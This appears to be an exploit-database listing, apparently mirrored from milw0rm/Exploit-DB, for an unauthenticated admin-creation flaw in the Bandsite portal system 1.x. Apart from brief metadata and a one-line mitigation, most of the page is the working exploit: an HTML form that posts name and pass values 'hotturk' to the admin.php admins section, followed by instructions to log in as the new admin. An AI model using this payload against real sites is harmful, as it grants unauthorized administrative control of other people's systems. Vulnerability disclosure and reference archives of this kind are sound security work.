header-logo
Suggest Exploit
vendor:
Bandsite portal system
by:
H0tTurk-
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Bandsite portal system
Affected Version From: 1.x
Affected Version To: 1.x
Patch Exists: NO
Related CWE: N/A
CPE: a:lycos:bandsite_portal_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Bandsite portal system Admin Added Access

Bandsite is an online portal system designed for Bands. It has an admin section to manage overall data and configurations. An attacker can bypass authentication by sending a POST request to the admin.php page with the name and pass parameters set to 'hotturk'.

Mitigation:

Ensure that authentication is properly implemented and enforced.
Source

Exploit-DB raw data:

<!--
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php 
- Author  : H0tTurk-

WebSiteVersion:1.x 
 - Problem : Admin Added Access.

Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more.
-->

      <TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
        <TBODY>
        <tr><td bgcolor=#ffffff>
&nbsp;</p>
<p>
<form action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins method=post>
   Name:<br>
<input type=text name='name' value='hotturk' size="20"><br>
   Pass:<br>
<input type=text name='pass' value='hotturk' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>

<!--
Admin Added :)
http://[target]/bandwebsite/login.php
and login as admin 
name :hotturk
pass : hotturk

--------------------------------------------------------
Special Thx: Dr.Max.Virus,GencTurk,Str0ke,SawTurk,Chironex Fleckeri,Unique-key,KurtEfendy,MadConfig,R4zor,Arabian-FighterZ,And Ayyildiz ViP Soldiers 
                                       "BUNDAN OTESÝ YA ÝSTÝKLAL YA OLUM"
-->

# milw0rm.com [2006-12-16]

Navigation

Suggest Exploit

Services By CQR